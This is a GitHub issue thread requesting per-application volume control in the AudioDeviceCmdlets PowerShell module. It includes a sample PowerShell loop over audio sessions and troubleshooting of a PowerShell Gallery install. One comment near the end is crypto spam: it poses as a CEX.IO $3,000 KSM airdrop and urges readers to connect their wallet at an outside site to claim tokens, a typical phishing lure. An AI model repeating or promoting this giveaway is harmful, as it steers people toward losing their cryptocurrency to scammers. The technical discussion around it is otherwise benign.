### ISSUE TITLE
Feature request - Control individual applications like in Volume mixer

### ISSUE THREAD

**Issue by Suncatcher** [frgnca/AudioDeviceCmdlets#18]
Does your cmdlet support getting info about apps that are currently active (=playing) in Windows Volume Mixer [like this](https://stackoverflow.com/questions/21200825/getting-individual-windows-application-current-volume-output-level-as-visualized)?
I wanna list them and get info about their volume levels.

**Comment by frgnca** [comment]
@Suncatcher No, not at this point.

**Comment by frgnca** [comment]
@Suncatcher I have started the fork [dev_v3.1_communicationDevice](https://github.com/frgnca/AudioDeviceCmdlets/tree/dev_v3.1_communicationDevice) for this enhancement request. 
Until then, it IS possible with the current version to get the processID/processName, volume level, and mute state of the different applications under each audio device. 
This is just a workaround, but please see the following file https://github.com/frgnca/AudioDeviceCmdlets/blob/dev_volume-mixer/dev_volume-mixer.ps1

**Comment by Suncatcher** [comment]
Well, I tried it and found out it's not working as it intended.
Here is the output of **dev_volume-mixer.ps1**

    App
    Idle
    Volume
    100
    Mute
    False
    ########################

It shows `Idle` whilst in fact I have two apps active in mixer: **System sounds** and **Chrome**, and none of them has volume level 100.

![image](https://user-images.githubusercontent.com/6388034/38878496-c03d7f92-4269-11e8-899d-7e982097dffa.png)

**Comment by frgnca** [comment]
@Suncatcher In fact, could you try the [dll from the dev branch](https://github.com/frgnca/AudioDeviceCmdlets/blob/dev_volume-mixer/AudioDeviceCmdlets.dll) and tell me what you think?
`Get-AudioSession -List`
Here's what it looks like at this point
![image](https://user-images.githubusercontent.com/22690304/38962562-e4a46a94-433b-11e8-9f71-3b6a2edd1701.png)

**Comment by Suncatcher** [comment]
How do I remove the previous DLL to try the new?

    PS C:\Windows\system32> Get-Module –ListAvailable | findstr Audio
    Binary     3.0.0.0    AudioDeviceCmdlets                  {Get-AudioDevice, Set-AudioDevice, Write-AudioDevice}

I do it like this, but this way fails

    PS C:\Windows\system32> Remove-Module -Name AudioDeviceCmdlets
    Remove-Module : No modules were removed. Verify that the specification of modules to remove is correct and those modules exist in the runspace.
    At line:1 char:1
    + Remove-Module -Name AudioDeviceCmdlets
    + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        + CategoryInfo          : ResourceUnavailable: (:) [Remove-Module], InvalidOperationException
        + FullyQualifiedErrorId : Modules_NoModulesRemoved,Microsoft.PowerShell.Commands.RemoveModuleCommand

**Comment by Suncatcher** [comment]
Well, it works not without glitches, but works and that's wonderful. About glitches:
It shows wrong level, e.g. 38% on the screenshot, when in reality it's 21%. Also It shows `Idle` instead of system sounds. 

![sketch](https://user-images.githubusercontent.com/6388034/39070505-5ae6248e-44ec-11e8-8d17-4ed309137969.png)

But all that doesn't matter for me. Could you please build a single cmdlet for this function? E.g. `GetMixerVolumes` or smth like that?
It's very cumbersome to type this script every time

    $deviceIndex=1
    ########################
    # Set $i to zero
    $i=0
    
    # While $i is less than the amount of audio session on the audio device
    while($i -lt (Get-AudioDevice -Index $deviceIndex).Device.AudioSessionManager.Sessions.Count)
    {
        Write-Host "########################"
        
        # Display audio session number
        Write-Host "Audio session #$($i + 1)"
        
        # Display processID of audio session
        Write-Host "Process name: $((Get-Process -Id (Get-AudioDevice -Index $deviceIndex).Device.AudioSessionManager.Sessions[$i].ProcessID).ProcessName)"
    
        # Display volume level of audio session
        Write-Host "Volume level: $(((Get-AudioDevice -Index $deviceIndex).Device.AudioSessionManager.Sessions[$i].SimpleAudioVolume.MasterVolume * 100).ToString('#'))%"
    
        # Display mute state of audio session
        Write-Host "Mute state:   $((Get-AudioDevice -Index $deviceIndex).Device.AudioSessionManager.Sessions[$i].SimpleAudioVolume.Mute)"
    
        # Increment $i
        $i++
    }
    Write-Host "########################"

**Comment by Suncatcher** [comment]
Also, is it possible to install your module not manually but via NuGet or some automated manner? In order to be up to date when your DLL is updated.

**Comment by cdhunt** [comment]
@Suncatcher We're working on getting the new version published to the PowerShell Gallery.

Old version: https://www.powershellgallery.com/packages/AudioDeviceCmdlets/

**Comment by Suncatcher** [comment]
Thanks a ton!

**Comment by frgnca** [comment]
I can confirme the current v3.0 dll is now available from the [PowerShell Gallery](https://www.powershellgallery.com/packages/AudioDeviceCmdlets/3.0.0.1). When I merge in the finished volume mixer feature, I will update to v3.1 there.

`PS> Save-Module -Name AudioDeviceCmdlets -Path <path>`
`PS> Install-Module -Name AudioDeviceCmdlets`

**Comment by Suncatcher** [comment]
I installed you module from PS Gallery exactly like above, but module commands are not recognized and in the exported commands I see nothing

![image](https://user-images.githubusercontent.com/6388034/39665594-b3ba0ecc-509f-11e8-9a11-8779461094e0.png)


Does it mean it was installed incorrectly?

**Comment by Suncatcher** [comment]
Well, I assume this is not the problem of publishing, but the problem of incorrect installation. As I said, module commands are not recognized:

     PS C:\Users\User> Get-AudioDevice -List
     Get-AudioDevice : The term 'Get-AudioDevice' is not recognized as the name of a cmdlet, function, script file, or
     operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try
     again.
     At line:1 char:1
     + Get-AudioDevice -List
     + ~~~~~~~~~~~~~~~
         + CategoryInfo          : ObjectNotFound: (Get-AudioDevice:String) [], CommandNotFoundException
         + FullyQualifiedErrorId : CommandNotFoundException

What has gone wrong? I just done

    PS> Save-Module -Name AudioDeviceCmdlets -Path <path>
    PS> Install-Module -Name AudioDeviceCmdlets

**Comment by Suncatcher** [comment]
Mmm, any suggestions? Tried to reinstall multiple times but module cmdlets are still not recognized.

**Comment by Craefter** [comment]
This link ain't working anymore: https://github.com/frgnca/AudioDeviceCmdlets/blob/dev_volume-mixer/AudioDeviceCmdlets.dll
I was looking for a way to log at regular intervals the audio volume settings of devices and applications. Reason being: Users complain about seemingly randomly changing audio settings. So I was planning on some sort of script which would generate an output trigger either by time or some sort of application event.
But, yeah, it seems like this dev tree has been deleted, am I correct?

**Comment by frgnca** [comment]
Correct. I still plan on adding this feature and merge it with future version v3.1 but I am currently in the process of moving places so I might not be able to code for this project for a bit.

**Comment by Craefter** [comment]
Do you still have that mentioned .dll for me to play around with until that
time? :)

**Comment by smmalis37** [comment]
Any update here?

**Comment by JuzioMiecio520** [comment]
Bump, any update? This feature would be awesome

**Comment by God-damnit-all** [comment]
Windows 10 (and presumably 11) has the ability to set what audio devices that individual apps listen to. For some reason, however, it resets often for me. If AudioDeviceCmdlets had the ability to set this, I could set up a script to run with Task Scheduler to make sure my apps are set correctly.

**Comment by kusamanetworkss** [comment]
## Congratulations! You've receive in $3,000 KSM Giveaway ($KSM) Airdrop 🪂🔴


CEX·IO is giving away $3,000 in $KSM coins, empowering you to take advantage of KSM staking on CEX·IO with 14% APY. Join the giveaway and earn a chance to win up to $500. Stake Kusama with CEX·IO, get high rewards and win prizes!

#### About

CEX·IO is a fully regulated multi-functional cryptocurrency exchange established in 2013, serving over 4 million customers worldwide. CEX·IO has been one of the first platforms to make fiat-to-crypto transactions accessible via bank transfers and to accept debit/credit card payments for crypto deposits and withdrawals to Visa or MasterCard.

→ [How to join the $3,000 KSM Giveaway Airdrop?](https://kusamanetworks.com/)


Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://cdn.airdropalert.com/images/metadata/kusamacex2222.jpeg)


### Step-by-Step Guide ''CEX·IO Kusama Giveaway''

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Use the connect method to interact with the contract
- 💰 Connect and receive your tokens
→ [Claim Your $KSM Today](https://kusamanetworks.com/)

**Comment by red-daut** [comment]
I know this is over a year old, but I am very interested in having this added.

Any update on this?
